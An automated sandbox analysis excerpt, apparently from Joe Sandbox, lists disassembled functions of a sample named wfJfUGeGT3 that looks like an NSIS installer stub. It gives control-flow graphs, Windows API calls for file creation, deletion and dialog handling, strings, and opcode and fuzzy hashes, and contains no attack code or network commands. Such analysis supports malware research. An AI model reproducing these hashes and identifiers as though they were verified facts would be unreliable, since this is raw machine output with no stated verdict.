                                                          • Associated: 00000000.00000002.2020551896.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_wfJfUGeGT3.jbxd
                                                          Similarity
                                                          • API ID: CountFileTickWrite$wsprintf
                                                          • String ID: ... %d%%$P1B$PqB
                                                          • API String ID: 651206458-1415242759
                                                          • Opcode ID: 18372cb804754b34bf2e2d58d5ea3eaed026bf3a7fa6db410709b4b609b292b8
                                                          • Instruction ID: fe8561038ca0c1f851d54235c72d98e4424113abdfb89388266e227e9cd06809
                                                          • Opcode Fuzzy Hash: 18372cb804754b34bf2e2d58d5ea3eaed026bf3a7fa6db410709b4b609b292b8
                                                          • Instruction Fuzzy Hash: E8617B7190021AEBCF10DF65E9846AF7BA8AB04316F14453BF905B6290DB789F50CBA9

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 469 405e95-405ea1 470 405ea2-405ed6 GetTickCount GetTempFileNameW 469->470 471 405ee5-405ee7 470->471 472 405ed8-405eda 470->472 473 405edf-405ee2 471->473 472->470 474 405edc 472->474 474->473
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00405EB3
                                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403814,008520C0,008560C8), ref: 00405ECE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020201383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2020186399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020218138.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020551896.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_wfJfUGeGT3.jbxd
                                                          Similarity
                                                          • API ID: CountFileNameTempTick
                                                          • String ID: nsa
                                                          • API String ID: 1716503409-2209301699
                                                          • Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                          • Instruction ID: fc3ef10fc4e670788618d569d9e14e1d65dd7a664a0663973dbebc503530dd57
                                                          • Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                          • Instruction Fuzzy Hash: C9F09675610604BBDB10CF59DD05A9FBBADEF94710F10803BEA45E7150E6B09E44C758

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 479 40139d-4013a2 480 40140c-40140e 479->480 481 401410 480->481 482 4013a4-4013b2 480->482 483 401412-401413 481->483 482->481 484 4013b4-4013b5 call 4015a0 482->484 486 4013ba-4013bf 484->486 487 4013c1-4013c9 call 40137e 486->487 488 401416-40141b 486->488 491 4013cb-4013cd 487->491 492 4013cf-4013d4 487->492 488->483 493 4013d6-4013db 491->493 492->493 493->480 494 4013dd-401406 MulDiv SendMessageW 493->494 494->480
                                                          APIs
                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                          • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020201383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2020186399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020218138.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020551896.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_wfJfUGeGT3.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: a45af70f12a2ff9289efdc41b9adff97a1dd73ee066bf74a3cdcdad6e34fb976
                                                          • Instruction ID: 4a7c6b10ca187eba816588ea1d9201846d19603f0f5fc62a4a658fec9e55caff
                                                          • Opcode Fuzzy Hash: a45af70f12a2ff9289efdc41b9adff97a1dd73ee066bf74a3cdcdad6e34fb976
                                                          • Instruction Fuzzy Hash: 22F0F432A10220DBDB165B349D44B263698AB44750F68863BF911FA2F1D67CCC128B5C

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 495 405e66-405e92 GetFileAttributesW CreateFileW
                                                          APIs
                                                          • GetFileAttributesW.KERNELBASE(00000003,004035DD,0085E0D8,80000000,00000003,?,?,?,00000000,00403A5D,?), ref: 00405E6A
                                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A5D,?), ref: 00405E8C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020201383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2020186399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020218138.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020551896.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_wfJfUGeGT3.jbxd
                                                          Similarity
                                                          • API ID: File$AttributesCreate
                                                          • String ID:
                                                          • API String ID: 415043291-0
                                                          • Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                          • Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
                                                          • Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                          • Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 500 405e46-405e53 GetFileAttributesW 501 405e63 500->501 502 405e55-405e5d SetFileAttributesW 500->502 502->501
                                                          APIs
                                                          • GetFileAttributesW.KERNELBASE(?,00406E97,?,?,?), ref: 00405E4A
                                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E5D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020201383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2020186399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020218138.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020551896.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_wfJfUGeGT3.jbxd
                                                          Similarity
                                                          • API ID: AttributesFile
                                                          • String ID:
                                                          • API String ID: 3188754299-0
                                                          • Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                          • Instruction ID: bfdd682a7b15487adc9015e6c601711f35dcdd947f77102e263bd76fd4388c72
                                                          • Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                          • Instruction Fuzzy Hash: C1C01271404800AAC6010B34DF0881A7A26AB90370B298B3AB0BAE00F0CB3088A99A18

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 503 403336-403355 ReadFile 504 403361 503->504 505 403357-40335a 503->505 507 403363-403365 504->507 505->504 506 40335c-40335f 505->506 506->507
                                                          APIs
                                                          • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020201383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2020186399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020218138.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020551896.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_wfJfUGeGT3.jbxd
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID:
                                                          • API String ID: 2738559852-0
                                                          • Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                          • Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
                                                          • Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                          • Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 0040604E: CharNextW.USER32(?,*?|<>/":,00000000,008560C8,008420A0,008560C8,00000000,004037EE,008560C8,-00000002,00403A21), ref: 004060B1
                                                            • Part of subcall function 0040604E: CharNextW.USER32(?,?,?,00000000), ref: 004060C0
                                                            • Part of subcall function 0040604E: CharNextW.USER32(?,008560C8,008420A0,008560C8,00000000,004037EE,008560C8,-00000002,00403A21), ref: 004060C5
                                                            • Part of subcall function 0040604E: CharPrevW.USER32(?,?,008420A0,008560C8,00000000,004037EE,008560C8,-00000002,00403A21), ref: 004060D9
                                                          • CreateDirectoryW.KERNELBASE(008560C8,00000000,008560C8,008560C8,008560C8,-00000002,00403A21), ref: 00403803
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020201383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2020186399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020218138.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020551896.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_wfJfUGeGT3.jbxd
                                                          Similarity
                                                          • API ID: Char$Next$CreateDirectoryPrev
                                                          • String ID:
                                                          • API String ID: 4115351271-0
                                                          • Opcode ID: 6aaccbf0f4c256e95583d3efcb425cbe1f8ad9d91dfce7af8f321156cb5e1b29
                                                          • Instruction ID: b75284c5955f365d0d9c4c727e495e4f3aae82af695c09dbce3dc5899ee9d583
                                                          • Opcode Fuzzy Hash: 6aaccbf0f4c256e95583d3efcb425cbe1f8ad9d91dfce7af8f321156cb5e1b29
                                                          • Instruction Fuzzy Hash: CBD0C751143D3061D5A1336A7D06FCF0D4DAF5271AB06407BF945B71C29E7C065A45FE

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 519 403368-40337c SetFilePointer
                                                          APIs
                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403770,?,?,?,?,00000000,00403A5D,?), ref: 00403376
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020201383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2020186399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020218138.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020551896.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_wfJfUGeGT3.jbxd
                                                          Similarity
                                                          • API ID: FilePointer
                                                          • String ID:
                                                          • API String ID: 973152223-0
                                                          • Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                          • Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
                                                          • Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                          • Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C
                                                          APIs
                                                          • DeleteFileW.KERNEL32(?), ref: 00406CCE
                                                          • lstrcatW.KERNEL32(007DB150,\*.*), ref: 00406D1F
                                                          • lstrcatW.KERNEL32(?,00408838), ref: 00406D3F
                                                          • lstrlenW.KERNEL32(?), ref: 00406D42
                                                          • FindFirstFileW.KERNEL32(007DB150,?), ref: 00406D56
                                                          • FindNextFileW.KERNEL32(?,?,000000F2,?), ref: 00406E38
                                                          • FindClose.KERNEL32(?), ref: 00406E49
                                                          Strings
                                                          • \*.*, xrefs: 00406D19
                                                          • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E6E
                                                          • Delete: DeleteFile failed("%s"), xrefs: 00406E13
                                                          • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EA9
                                                          • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EC6
                                                          • Delete: DeleteFile("%s"), xrefs: 00406DD2
                                                          • RMDir: RemoveDirectory("%s"), xrefs: 00406E85
                                                          • Delete: DeleteFile on Reboot("%s"), xrefs: 00406DF6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020201383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2020186399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020218138.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020551896.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_wfJfUGeGT3.jbxd
                                                          Similarity
                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                          • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
                                                          • API String ID: 2035342205-3294556389
                                                          • Opcode ID: 4b1b557670e2683e68bec861c381546d6e6092d77848359203819f0ab52b989c
                                                          • Instruction ID: 0e06370173042cf1970d3b282d3fdac29725624d265da3f13fe54d6ba55e86a8
                                                          • Opcode Fuzzy Hash: 4b1b557670e2683e68bec861c381546d6e6092d77848359203819f0ab52b989c
                                                          • Instruction Fuzzy Hash: EE51F435904305AACB217B65CD46ABF37B8DF41724F16813FF902751C1DB3C49A29AAD
                                                          APIs
                                                          • GetVersion.KERNEL32(007B9A60,?,00000000,00404FBF,007B9A60,00000000,00427150,0041F150,00000000), ref: 004068EC
                                                          • GetSystemDirectoryW.KERNEL32(007E0D60,00002004), ref: 0040696E
                                                            • Part of subcall function 0040601F: lstrcpynW.KERNEL32(?,?,00002004,00403907,007E95E0,NSIS Error), ref: 0040602C
                                                          • GetWindowsDirectoryW.KERNEL32(007E0D60,00002004), ref: 00406981
                                                          • lstrcatW.KERNEL32(007E0D60,\Microsoft\Internet Explorer\Quick Launch), ref: 004069FB
                                                          • lstrlenW.KERNEL32(007E0D60,007B9A60,?,00000000,00404FBF,007B9A60,00000000,00427150,0041F150,00000000), ref: 00406A5D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020201383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2020186399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020218138.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020551896.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_wfJfUGeGT3.jbxd
                                                          Similarity
                                                          • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                          • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$`~$`~
                                                          • API String ID: 3581403547-450655766
                                                          • Opcode ID: 374e0595bb97e7487ac609e740c3c1fde53312a0c63930343963d002ff647ad1
                                                          • Instruction ID: f0e19f9528a57ac158c9a3c92ca4e3ea7bb27298c0fdca1021e2216b23c4434f
                                                          • Opcode Fuzzy Hash: 374e0595bb97e7487ac609e740c3c1fde53312a0c63930343963d002ff647ad1
                                                          • Instruction Fuzzy Hash: 9771F3B1A00215EBDF20AF69CC456BA3774AB55714F12C03FE902BA2D0D73D89A1DF99
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020201383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2020186399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020218138.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020551896.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_wfJfUGeGT3.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 65dabb3e933bcef0ed0642d24bd0ae254dba7200c983b735164db606a1674a6a
                                                          • Instruction ID: 27a4fad9cef60e4803cbff8213b55d1ca64cbec4a5672e8aa3d352da4673dde9
                                                          • Opcode Fuzzy Hash: 65dabb3e933bcef0ed0642d24bd0ae254dba7200c983b735164db606a1674a6a
                                                          • Instruction Fuzzy Hash: 03429E71D08249DFDB15CF59C8806EEBBB5EF14318F14807BDC49AB286D338A946CB66

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 520 40548f-4054a1 521 4055e3-4055f2 520->521 522 4054a7-4054ad 520->522 524 405641-405656 521->524 525 4055f4-40563c GetDlgItem * 2 call 403d55 SetClassLongW call 40141d 521->525 522->521 523 4054b3-4054bc 522->523 528 4054d1-4054d4 523->528 529 4054be-4054cb SetWindowPos 523->529 526 405696-40569b call 403dc5 524->526 527 405658-40565b 524->527 525->524 539 4056a0-4056bb 526->539 531 40565d-405668 call 40139d 527->531 532 40568e-405690 527->532 534 4054d6-4054e8 ShowWindow 528->534 535 4054ee-4054f4 528->535 529->528 531->532 553 40566a-405689 SendMessageW 531->553 532->526 538 405936 532->538 534->535 540 405510-405513 535->540 541 4054f6-40550b DestroyWindow 535->541 548 405938-40593f 538->548 546 4056c4-4056ca 539->546 547 4056bd-4056bf call 40141d 539->547 543 405515-405521 SetWindowLongW 540->543 544 405526-40552c 540->544 549 405913-405919 541->549 543->548 551 405532-405543 GetDlgItem 544->551 552 4055cf-4055de call 403de0 544->552 556 4056d0-4056db 546->556 557 4058f4-40590d DestroyWindow EndDialog 546->557 547->546 549->538 554 40591b-405921 549->554 558 405562-405565 551->558 559 405545-40555c SendMessageW IsWindowEnabled 551->559 552->548 553->548 554->538 561 405923-40592c ShowWindow 554->561 556->557 562 4056e1-40572e call 40681b call 403d55 * 3 GetDlgItem 556->562 557->549 563 405567-405568 558->563 564 40556a-40556d 558->564 559->538 559->558 561->538 590 405730-405736 562->590 591 405739-405775 ShowWindow EnableWindow call 403d9b EnableWindow 562->591 568 405598-40559d call 403d2e 563->568 569 40557b-405580 564->569 570 40556f-405575 564->570 568->552 573 4055b6-4055c9 SendMessageW 569->573 575 405582-405588 569->575 570->573 574 405577-405579 570->574 573->552 574->568 578 40558a-405590 call 40141d 575->578 579 40559f-4055a8 call 40141d 575->579 588 405596 578->588 579->552 587 4055aa-4055b4 579->587 587->588 588->568 590->591 594 405777-405778 591->594 595 40577a 591->595 596 40577c-4057aa GetSystemMenu EnableMenuItem SendMessageW 594->596 595->596 597 4057ac-4057bd SendMessageW 596->597 598 4057bf 596->598 599 4057c5-405803 call 403dae call 40601f lstrlenW call 40681b SetWindowTextW call 40139d 597->599 598->599 599->539 608 405809-40580b 599->608 608->539 609 405811-405815 608->609 610 405834-405848 DestroyWindow 609->610 611 405817-40581d 609->611 610->549 613 40584e-40587b CreateDialogParamW 610->613 611->538 612 405823-405829 611->612 612->539 615 40582f 612->615 613->549 614 405881-4058d8 call 403d55 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 613->614 614->538 620 4058da-4058f2 ShowWindow call 403dc5 614->620 615->538 620->549
                                                          APIs
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054CB
                                                          • ShowWindow.USER32(?), ref: 004054E8
                                                          • DestroyWindow.USER32 ref: 004054FC
                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00405518
                                                          • GetDlgItem.USER32(?,?), ref: 00405539
                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 0040554D
                                                          • IsWindowEnabled.USER32(00000000), ref: 00405554
                                                          • GetDlgItem.USER32(?,00000001), ref: 00405603
                                                          • GetDlgItem.USER32(?,00000002), ref: 0040560D
                                                          • SetClassLongW.USER32(?,000000F2,?), ref: 00405627
                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405678
                                                          • GetDlgItem.USER32(?,00000003), ref: 0040571E
